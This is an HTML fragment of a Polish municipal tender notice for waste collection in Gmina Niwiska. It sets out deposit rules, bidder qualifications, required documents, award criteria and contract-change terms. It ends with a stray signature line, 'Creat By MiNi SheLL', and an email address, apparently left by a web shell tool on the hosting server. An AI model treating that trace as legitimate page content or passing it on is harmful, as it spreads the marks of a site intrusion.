1) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 6. 
2)  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 
3) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
4) Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
5) Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
6) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
7) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
c) zawarcie umowy w  sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że:
a) posiada wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Niwiska,
b) posiada zezwolenie na prowadzenie działalności w zakresie transportu i zbierania odpadów, wydane przez właściwy organ,
c) posiada wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzony przez Głównego Inspektora Ochrony Środowiska.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że:
dysponuje lub będzie dysponować samochodami specjalistycznymi i samochodem ciężarowym,
spełniającymi wymagania techniczne określone przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami szczególnymi, w ilości:
-  do odbioru odpadów podlegających selektywnej zbiórce i zmieszanych minimum 2 szt. pojazdów przystosowanych do odbioru odpadów komunalnych,
-minimum 1 szt. pojazd z dźwignikiem hakowym lub bramowym do odbioru kontenerów z odpadami,
- minimum 1 szt. samochód z systemem HDS  do opróżniania pojemników dzwonowych do selektywnej zbiórki odpadów,
- minimum 1 szt. samochód ciężarowy przystosowany do odbioru odpadów wielkogabarytowych lub odpadów umieszczonych w szczelnych workach plastikowych,
wzór wykazu stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku dotyczącego osób zdolnych do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna :
a) posiadanie środków finansowych lub zdolności kredytowej na kwotę minimum 200 000,00 - zł,
b) posiadanie  ubezpieczenia od  odpowiedzialności  cywilnej  w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia w wysokości nie niższej niż 100 000,00 - zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadku uznania oferty Wykonawców ubiegających się wspólnie o udzielenie zamówienia za najkorzystniejszą i zawarcia umowy, Wykonawcy Ci ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.
2.Postanowienia  dotyczące  realizacji  niniejszego  zamówienia  zawiera  WZÓR  UMOWY  - stanowiący załącznik   nr  2  do  SIWZ.  Wzór  umowy  zawiera  wszelkie  istotne  dla  Zamawiającego i Wykonawcy warunki realizacji zamówienia publicznego.
3.  Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności.
4.Strony dopuszczają zmianę postanowień umowy zgodnie z wymogami artykułu 144 ustawy PZP  w  przypadku  wystąpienia  okoliczności,  których  nie  można  było  przewidzieć  w chwili zawarcia niniejszej umowy tj.:
1) zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy, w tym w szczególności ustawy z  dnia 13.09.1996r. o utrzymaniu czystości i porządku w gminach oraz uchwał Rady Gminy Niwiska podjętych na podstawie tejże ustawy,
2) zmiany stawki  opłaty z tytułu umieszczenia odpadów na składowisku, określonej w art. 290 ust. 1 pkt 4 ustawy  z dnia 27  kwietnia 2001 r. Prawo ochrony środowiska (t.j. - Dz.U. z 2008r. Nr 25, poz. 150) - nie więcej niż o 8 % kwoty wynagrodzenia brutto pozostałego do końca realizacji umowy za  każde 50 %  wzrostu stawki opłaty w stosunku do obowiązującej w dniu zawarcia umowy;
3) zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy,
4) niezależnych  od  stron  umowy  zmian  organizacyjnych  dotyczących  osób  kluczowych  dla realizacji  umowy  (w  szczególności  umowy,  wypadku  losowego,  nieprzewidzianej  zmiany organizacyjnej).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.niwiska.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Niwiska, 36 - 147 Niwiska 430, woj. podkarpackie, pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2015 godzina 09:00, miejsce: Urząd Gminy Niwiska, 36 - 147 Niwiska 430, woj. podkarpackie, pokój nr 10 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com